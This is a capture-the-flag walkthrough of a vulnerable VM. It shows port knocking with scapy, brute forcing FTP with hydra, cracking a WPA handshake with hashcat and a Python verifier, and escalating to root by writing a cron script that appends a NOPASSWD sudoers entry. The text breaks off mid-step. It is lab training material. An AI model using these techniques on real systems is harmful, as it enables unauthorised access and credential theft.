Overview

Plot: Help Billy Madison stop Eric from taking over Madison Hotels!

Sneaky Eric Gordon has installed malware on Billy’s computer right before the two of them are set to face off in an academic decathlon. Unless Billy can regain control of his machine and decrypt his 12th grade final project, he will not graduate from high school. Plus, it means Eric wins, and he takes over as head of Madison Hotels!

Objective: The primary objective of the VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the box to complete this objective.

Attack Narrative

The first step in any penetration test is reconnaissance. Depending on the scope of the engagement, this starts with passive recon: gathering details about the target without touching it, so that the target is not tipped off.

I begin active recon with an nmap scan to determine which services are running on the host:


root@KaiZen:~# nmap 10.0.2.46

Starting Nmap 7.31 ( https://nmap.org ) at 2016-10-29 14:17 EDT
Nmap scan report for 10.0.2.46
Host is up (0.0010s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2525/tcp open ms-v-worlds
MAC Address: 08:00:27:75:58:28 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 59.94 seconds

For this assessment I enumerate the open ports in order from low to high, starting with SSH (22):


root@KaiZen:~# nmap -sV --version-all -sC -p22 10.0.2.46

Starting Nmap 7.31 ( https://nmap.org ) at 2016-10-29 14:22 EDT
Nmap scan report for 10.0.2.46
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
MAC Address: 08:00:27:75:58:28 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds
root@KaiZen:~# nc -v 10.0.2.46 22
10.0.2.46: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.2.46] 22 (ssh) open
root@KaiZen:~# nc -vn 10.0.2.46 22
(UNKNOWN) [10.0.2.46] 22 (ssh) open
root@KaiZen:~# ssh 10.0.2.46
ssh_exchange_identification: Connection closed by remote host
root@KaiZen:~# 

nmap reports port 22 as tcpwrapped, which means the TCP handshake completes but the service closes the connection before sending any banner; a direct ssh attempt confirms it, dying before the identification exchange. SSH gives nothing useful at this point, so I move on.

Telnet enumeration reveals an interesting result:


root@KaiZen:~# nc -nv 10.0.2.46 23
(UNKNOWN) [10.0.2.46] 23 (telnet) open

***** HAHAH! You're banned for a while, Billy Boy! By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

The telnet banner gives the first clue: “…ROTten passwords like rkfpuzrahngvat”.

“ROTten” hints at a rotation cipher. Read literally it could mean ROT10, but ROT13 is by far the most common, so I try that first using tr, which maps a-z onto n-za-m:


root@KaiZen:~# echo rkfpuzrahngvat | tr a-z n-za-m
exschmenuating

The result doesn’t look much like a password, but it does look like the name of a hidden web directory, and the web server confirms it:
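When the shift is not known, guessing is unnecessary: the following Python script, added here as an example and not part of the original writeup, prints every rotation of the banner clue so the readable one stands out, and shows that ROT10 (what the pun literally suggests) gives nothing useful while ROT13 does.

```python
import string

LOWER = string.ascii_lowercase


def rot(text: str, shift: int) -> str:
    """Caesar-shift the letters of `text` by `shift` positions; non-letters pass through."""
    out = []
    for ch in text:
        if ch.islower():
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch.isupper():
            out.append(LOWER[(LOWER.index(ch.lower()) + shift) % 26].upper())
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    """ROT13 is its own inverse: rot13(rot13(x)) == x."""
    return rot(text, 13)


def all_shifts(text: str) -> dict:
    """Return {shift: decoded} for every non-trivial shift, so a reader can pick the real word."""
    return {n: rot(text, n) for n in range(1, 26)}


if __name__ == "__main__":
    clue = "rkfpuzrahngvat"  # from the telnet banner above
    for n, candidate in all_shifts(clue).items():
        print(f"ROT{n:2d}: {candidate}")
```

Only the ROT13 line reads as a word; ROT10 yields a non-word, which settles the ROT10-versus-ROT13 question without guessing.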


root@KaiZen:~# curl -I http://10.0.2.46/exschmenuating/
HTTP/1.1 200 OK
Date: Fri, 04 Nov 2016 23:06:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8

The page at the hidden directory contains a snarky message:

“Ruin Billy Madison’s Life” – Eric’s notes

08/01/16

Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy’s life. Will ponder other victims.

08/02/16

Ah! Genius thought! Billy’s girlfriend Veronica uses his machine too. I might have to cook up a phish and see if I can’t get her to take the bait.

08/03/16

OMg LOL LOL LOL!!! What a twit – I can’t believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put “veronica” somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords – if that’s true, she rocks! Anyway, malware installation successful. I’m now in complete control of Bill’s machine!

Log monitor

This will help me keep an eye on Billy’s attempt to free his machine from my wrath.

View log

Two details in this entry stand out:

“I .captured the whole thing in this folder for later lulz. I put “veronica” somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords – if that’s true, she rocks!”

The stray period in “.captured” hints at a .cap packet capture, the file name contains “veronica”, and Eric bets that her passwords contain her name.

I fire up wfuzz to find the packet capture file, using rockyou as the wordlist because, well, Veronica rocks, right?! FUZZ is replaced by each wordlist entry, and --hc hides the 404 and 400 responses so only real hits are shown:


root@KaiZen:~/vulnhub/bmadison1.1# wfuzz -t 100 -c -z file,/root/vulnhub/bmadison1.1/rocku.txt --hc=404,400 http://10.0.2.46/exschmenuating/FUZZveronica.cap
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer *
********************************************************

Target: http://10.0.2.46/exschmenuating/FUZZveronica.cap
Total requests: 14336751

==================================================================
ID Response Lines Word Chars Request
==================================================================
54058: C=200 192 L 722 W 8700 Ch "012987"

After a while wfuzz finds the hidden file: 012987veronica.cap.
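The same search, written as an added Python example rather than taken from the writeup: it builds file names from a wordlist with “veronica” placed either before or after each word (the note only says the name is somewhere in the file name, so both placements are tried), sends HEAD requests so no response bodies are transferred, and reports every URL whose status is not in the hidden set, mirroring wfuzz’s --hc option. The base URL and wordlist path are command-line arguments; the probe function is pluggable so the logic can be exercised without a target.

```python
import sys
import urllib.error
import urllib.request
from typing import Callable, Iterable, Iterator, List, Tuple


def candidates(words: Iterable[str], fixed: str = "veronica", ext: str = ".cap") -> Iterator[str]:
    """Yield `<word>veronica.cap` and `veronica<word>.cap` for each wordlist entry.
    Blank entries and entries containing '/' (which would change the path) are skipped."""
    for w in words:
        w = w.strip()
        if not w or "/" in w:
            continue
        yield f"{w}{fixed}{ext}"
        yield f"{fixed}{w}{ext}"


def head_status(url: str, timeout: float = 5.0) -> int:
    """HEAD request; returns the HTTP status code without downloading a body."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def find_files(base_url: str, words: Iterable[str], hide: Tuple[int, ...] = (404, 400),
               probe: Callable[[str], int] = head_status) -> List[str]:
    """Probe every candidate under base_url; return the URLs whose status is not hidden
    (the equivalent of wfuzz --hc=404,400)."""
    hits = []
    for name in candidates(words):
        url = base_url.rstrip("/") + "/" + name
        if probe(url) not in hide:
            hits.append(url)
    return hits


if __name__ == "__main__":
    # usage: python3 capfuzz.py http://10.0.2.46/exschmenuating /usr/share/wordlists/rockyou.txt
    base, wordlist = sys.argv[1], sys.argv[2]
    with open(wordlist, encoding="latin-1", errors="ignore") as fh:
        for hit in find_files(base, fh):
            print(hit)
```

Against a 14-million-line wordlist this single-threaded loop is far slower than wfuzz with -t 100; the point is the candidate generation and the status filter, which carry over unchanged to any faster client.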

After downloading the file locally I process it with tcpflow, which reassembles each TCP stream into its own file:


root@KaiZen:~/vulnhub/bmadison1.1/capt# tcpflow -v -r 012987veronica.cap
tcpflow: TCPFLOW version 1.4.5
tcpflow: looking for handler for datalink type 1 for interface 012987veronica.cap
...
tcpflow: new flow flow[192.168.3.101:42278->192.168.3.130:2525]. path: next seq num (nsn):859952335
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42278-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42278-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42278-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42280->192.168.3.130:2525]. path: next seq num (nsn):1548131559
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42280-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42280-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42280-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42282->192.168.3.130:2525]. path: next seq num (nsn):325497772
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42282-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42282-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42282-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42284->192.168.3.130:2525]. path: next seq num (nsn):-845402372
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42284-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42284-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42284-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42286->192.168.3.130:2525]. path: next seq num (nsn):-1529681360
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42286-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42286-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42286-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42288->192.168.3.130:2525]. path: next seq num (nsn):-1580545661
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42288-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42288-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42288-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: Open FDs at end of processing: 0
tcpflow: demux.max_open_flows: 1
tcpflow: Flow map size at end of processing: 0
tcpflow: Flows seen: 6
tcpflow: Total flows processed: 6
tcpflow: Total packets processed: 60

tcpflow extracted six flows, all from 192.168.3.101 to port 2525 on 192.168.3.130, the same port nmap found open on the target (nmap’s ms-v-worlds label is only its port-table guess; the traffic is plain SMTP). Reassembled client side, with the SMTP envelope commands intact, they turn out to be emails between Eric and Veronica:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica,

Eric Gordon here.

I know you use Billy’s machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users. Just <a href=”http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php”>click here</a> to install it, k?

Thanks. -Eric

.
QUIT

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the “Spanish Armada” combo.

-VV

.
QUIT

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect. Please set me up an account with username of “eric” and password “ericdoesntdrinkhisownpee.”

-Eric

.
QUIT

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

.
QUIT

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account – the install will be automatic and you won’t get any pop-ups or anything like that. Thanks!

-Eric

.
QUIT

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird. The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff. I’m going to send this email to you and then shut the computer down. I have some important files I’m worried about, and Billy’s working on his big 12th grade final. I don’t want anything to happen to that!

-V

.
QUIT

The thread says FTP stays off “unless someone connects with the ‘Spanish Armada’ combo”, which, together with the video, smells of port knocking: hitting a sequence of closed ports in the right order opens the real service. I used a Python script with scapy to send the knock sequence and then drop into an FTP session.


#!/usr/bin/env python3
# Knock on the "Spanish Armada" port sequence with scapy, then open an FTP session.
# scapy's send() writes raw packets, so this has to run as root.
import subprocess
from scapy.all import IP, TCP, conf, send

conf.verb = 0                                  # silence scapy's per-packet output
ports = [1466, 67, 1469, 1514, 1981, 1986]     # knock sequence, in order
target = "10.0.2.46"

# Knock on every port with a bare SYN; a port-knock listener only watches for the
# connection attempt, so no handshake needs to complete.
for dport in ports:
    print("[*] Knocking on", target, dport)
    syn = IP(dst=target) / TCP(dport=dport, flags="S", window=2048, options=[("MSS", 1460)], seq=0)
    send(syn)
    print("*KNOCK*")

# Connect to the now open FTP port
print("[*] Connecting to FTP")
subprocess.call(["ftp", target])

Now that the hidden FTP server answers, I log in as “eric” with the password from the email thread and find that he’s been busy:


ftp > ls -la
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
226 Transfer completed.

I find a “.notes” file and several files whose numeric names look like exploit-db.com IDs.

The .notes file provides another clue

Ugh, this is frustrating.

I managed to make a system account for myself. I also managed to hide Billy’s paper
where he’ll never find it. However, now I can’t find it either :-(.
To make matters worse, my privesc exploits aren’t working.
One sort of worked, but I think I have it installed all backwards.

If I’m going to maintain total control of Billy’s miserable life (or what’s left of it)
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.
All I need to do is send an email that includes
the text: “My kid will be a ________ _________”

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I’m sure Billy or Veronica know. I didn’t see it in Billy’s FTP folders, but didn’t have time to check Veronica’s.

-EG

From the clues in the .notes file we need to do three things

  • Solve the riddle
  • Open the ssh backdoor
  • Find the password to the ssh backdoor

I watched the video from the link and solved the riddle: “my kid will be a soccer player”

To open the ssh backdoor I wrote a quick python script to send an email with the secret code


#!/usr/bin/env python3
# Send the trigger phrase to the SMTP service on port 2525 to open the SSH backdoor.
import smtplib

server = smtplib.SMTP('10.0.2.46', 2525)
fromaddr = "eric@madisonhotels.com"
toaddr = "vvaughn@polyfector.edu"
msg = "My kid will be a soccer player"   # the riddle's answer, sent as the message body
server.sendmail(fromaddr, toaddr, msg)
server.quit()

Note: don’t name the script email.py. A file by that name shadows the standard-library email package that smtplib imports, so the import fails; I had to rename the script and delete the stale .pyc file.

Now I need the password. The earlier clue said Veronica “rocks” and probably uses her name in her passwords, so I build a wordlist from rockyou containing only the entries that mention “veronica”:

root@KaiZen:~# grep veronica /usr/share/wordlists/rockyou.txt > /root/vulnhub/bmadison1.1/veronica_pass.txt

With the wordlist created I used hydra to bruteforce the FTP server.

root@KaiZen:~/vulnhub/bmadison1.1# hydra -l veronica -P veronica_pass.txt ftp://10.0.2.46
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. 

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-24 16:32:26
[DATA] max 16 tasks per 1 server, overall 64 tasks, 773 login tries (l:1/p:773), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.0.2.46 login: veronica password: babygirl_veronica07@yahoo.com
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-24 16:32:45

Password obtained! Now to login and explore …

root@KaiZen:~/vulnhub/bmadison1.1# ftp 10.0.2.46
Connected to 10.0.2.46.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (10.0.2.46:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp > ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap
226 Transfer completed.

Another email and another packet capture.

The email explains what the capture is: Billy’s attempt at cracking Eric’s wireless network, and Eric’s .notes file says his wifi password is also the password for the SSH backdoor.

Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric’s wifi

Hey VV,

It’s your boy Billy here. Sorry to leave in the middle of the night but I wanted to crack Eric’s wireless and then mess with him.
I wasn’t completely successful yet, but at least I got a start.

I didn’t walk away without doing my signature move, though. I left a flaming bag of dog poo on his doorstep. 🙂

Kisses,

Billy

The capture contains the four-way handshake needed to crack a WPA/WPA2 pre-shared key. This can be done with aircrack-ng directly or with hashcat; I chose hashcat, so I first use aircrack-ng’s -J option to convert the handshake into hashcat’s .hccap format:


root@KaiZen:~/vulnhub/bmadison1.1# aircrack-ng eg-01.cap -J eg-01-hc.cap
Opening eg-01.cap
Read 13003 packets.

# BSSID ESSID Encryption

1 02:13:37:A5:52:2E EricGordon WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 10): EricGordon
[*] Key version: 2
[*] BSSID: 02:13:37:A5:52:2E
[*] STA: 74:DA:38:66:1D:63
[*] anonce:
B2 FF 55 74 30 54 B9 BB 8F 3C 59 03 D7 01 46 A7
72 C2 95 B5 EE 03 CC 93 11 A1 76 54 6D AA E8 0A
[*] snonce:
B2 DF 16 E1 85 77 5E 2B C9 E9 53 41 A5 99 01 74
55 81 3E 4B C5 95 B8 EA 01 C5 5E 2A B2 B0 51 E6
[*] Key MIC:
86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33
[*] eapol:
01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00
03 B2 DF 16 E1 85 77 5E 2B C9 E9 53 41 A5 99 01
74 55 81 3E 4B C5 95 B8 EA 01 C5 5E 2A B2 B0 51
E6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC
04 01 00 00 0F AC 02 00 00

Successfully written to eg-01-hc.cap.hccap

Quitting aircrack-ng...

Then I point hashcat at the file and use rockyou again \m/


root@KaiZen:~/vulnhub/bmadison1.1# hashcat -m 2500 eg-01-hc.cap.hccap /usr/share/wordlists/rockyou.txt -w 4

EricGordon:021337a5522e:74da38661d63:triscuit*

Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: File (/usr/share/wordlists/rockyou.txt)
Hash.Target....: EricGordon (02:13:37:a5:52:2e <-> 74:da:38:66:1d:63)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Oct 24 16:53:24 2016 (17 mins, 26 secs)
Speed.Dev.#1...: 1607 H/s (304.45ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 3079247/14343297 (21.47%)
Rejected.......: 1371215/3079247 (44.53%)
Restore.Point..: 3076804/14343297 (21.45%)

Started: Mon Oct 24 16:53:24 2016
Stopped: Mon Oct 24 17:10:53 2016

Seventeen minutes later I have Eric’s wifi password, triscuit*, which the .notes file says is also the password for the SSH backdoor.
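To show what hashcat is actually doing in mode 2500, here is an added Python example (mine, not the writeup’s) that verifies a candidate passphrase against the handshake values aircrack-ng printed above: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds); PTK from the 802.11i PRF over the two MACs and the two nonces; and the Key MIC as HMAC-SHA1 (key version 2) over the EAPOL frame with its MIC field zeroed, which is how the .hccap stores it. The constants are copied byte for byte from the aircrack-ng output; the candidate list in the usage call is made up. Like hashcat, it skips candidates outside the 8 to 63 character WPA passphrase range, which is what the Rejected counter above reflects.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Handshake values copied from the aircrack-ng -J output above.
ESSID = b"EricGordon"
AP_MAC = bytes.fromhex("021337a5522e")   # BSSID (authenticator)
STA_MAC = bytes.fromhex("74da38661d63")  # STA (supplicant)
ANONCE = bytes.fromhex("b2ff55743054b9bb8f3c5903d70146a7"
                       "72c295b5ee03cc9311a176546daae80a")
SNONCE = bytes.fromhex("b2df16e185775e2bc9e95341a5990174"
                       "55813e4bc595b8ea01c55e2ab2b051e6")
KEY_MIC = bytes.fromhex("8663534b7752820c734afaca19790533")
KEY_VERSION = 2                          # 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1 (CCMP)
# EAPOL-Key frame (message 2 of the handshake) with its 16-byte MIC field zeroed,
# exactly as the .hccap stores it; one string per 16-byte line as aircrack-ng printed them.
EAPOL = bytes.fromhex(
    "0103007502010a000000000000000000"
    "03b2df16e185775e2bc9e95341a59901"
    "7455813e4bc595b8ea01c55e2ab2b051"
    "e6000000000000000000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000000000000"
    "00001630140100000fac040100000fac"
    "040100000fac020000")


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes, key_version: int) -> bytes:
    """Key MIC: HMAC-MD5 for key version 1, HMAC-SHA1 for version 2, truncated to 16 bytes.
    (Key version 3, AES-128-CMAC, is not handled here.)"""
    digestmod = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, eapol, digestmod).digest()[:16]


def check_passphrase(passphrase: str) -> bool:
    """True if the passphrase reproduces the captured Key MIC."""
    pmk = pmk_from_passphrase(passphrase, ESSID)
    ptk = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    kck = ptk[:16]                       # first 128 bits of the PTK: the Key Confirmation Key
    return hmac.compare_digest(eapol_mic(kck, EAPOL, KEY_VERSION), KEY_MIC)


def crack(candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack; candidates outside WPA's 8..63 character range are skipped, as hashcat does."""
    for word in candidates:
        word = word.rstrip("\r\n")
        if 8 <= len(word) <= 63 and check_passphrase(word):
            return word
    return None


if __name__ == "__main__":
    # Constructed candidate list; a real run would stream rockyou.txt through crack().
    print(crack(["password", "madisonhotels", "triscuit*"]))
```

At 4096 PBKDF2 rounds per candidate this pure-Python loop manages a few hundred guesses per second on one core, which is why the real job goes to hashcat; the logic, however, is identical, and a single call to check_passphrase() is a quick way to confirm a recovered key against a capture without re-running the cracker.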

Now I run the email script to open the backdoor and rescan with nmap, which finds a new open port:


Nmap scan report for 10.0.2.46
Host is up (0.0012s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1974/tcp open drp
2525/tcp open ms-v-worlds

Now that the ssh port is open and I have the password I can login via ssh.


root@KaiZen:~# ssh eric@10.0.2.46 -p1974
eric@10.0.2.46's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

66 packages can be updated.
0 updates are security updates.
Last login: Fri Oct 28 18:13:53 2016 from 10.0.2.44
eric@BM:~$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)

Now all I need to do is escalate.

In an earlier clue from the .notes file, something struck me as interesting “To make matters worse, my privesc exploits aren’t working. One sort of worked, but I think I have it installed all backwards.”

I look for SUID files that may be interesting:


eric@BM:~$ find / -perm -u=s -type f 2>/dev/null -exec ls -la {} \;
-r-sr-s--- 1 root eric 372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
-rwsr-xr-x 1 root root 136808 May 4 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd

I notice a file owned by root with group eric that is both setuid and setgid (the s in both the owner and group execute positions). sudo, pkexec and passwd are standard Ubuntu binaries; this is the only entry that looks out of the ordinary.

When run without arguments the file prints its usage:


eric@BM:~$ /usr/local/share/sgml/donpcgd
Usage: /usr/local/share/sgml/donpcgd path1 path2

Given two paths, the program creates a file at the second path. The debug line shows a mknod() call with mode 0x81b4, which is S_IFREG | 0664: a regular file writable by its owner and group. Because the binary runs setuid root it can create that file anywhere on the filesystem, and because it also runs setgid eric the new file ends up group-writable by eric. That is an arbitrary file write as root.

I create a file called test in /tmp, then use donpcgd to create a file of the same name in /etc/cron.hourly:


eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
#### mknod(/etc/cron.hourly/test,81b4,0)

With the file in cron.hourly I add a script that gives eric passwordless sudo. (Appending to /etc/sudoers directly is risky on a real engagement: a syntax error there breaks sudo for everyone, so prefer dropping a file under /etc/sudoers.d and checking it with visudo -cf first.)

eric@BM:~$ echo -e '#!/bin/bash\n echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
eric@BM:~$ ls -a /etc/cron.hourly/
.placeholder test
eric@BM:~$ cat /etc/cron.hourly/test
#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

After waiting for the next hourly cron run I come back: the script has fired and eric can now sudo.


eric@BM:~$ sudo id
uid=0(root) gid=0(root) groups=0(root)

I still need to recover Billy’s document. In a directory called /PRIVATE, readable only by root, I find a file called BowelMovement and a hint.txt:


eric@BM:~$ sudo ls -la /PRIVATE/
total 1036
drwx------ 2 root root 4096 Aug 29 09:58 .
drwxr-xr-x 25 root root 4096 Oct 21 15:20 ..
-rw-rw-r-- 1 billy billy 1048576 Aug 21 16:42 BowelMovement
-rw-r--r-- 1 root root 221 Aug 29 09:08 hint.txt

The hint.txt file has a couple of clues that are important


eric@BM:~$ sudo cat /PRIVATE/hint.txt
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison. That truely cracks me up! LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

The file is most likely a TrueCrypt volume: it is exactly 1 MiB (1048576 bytes), the hint talks about a password, and TrueCrypt containers have no recognisable header (the header itself is encrypted, so file(1) reports only data). I use cewl to build a wordlist from the Wikipedia page the hint points at, to find the password needed to mount it:


root@KaiZen:~/vulnhub/bmadison1.1# cewl -d 1 -w truecrack.lst https://en.wikipedia.org/wiki/Billy_Madison

truecrack, fed the cewl wordlist, finds the password:


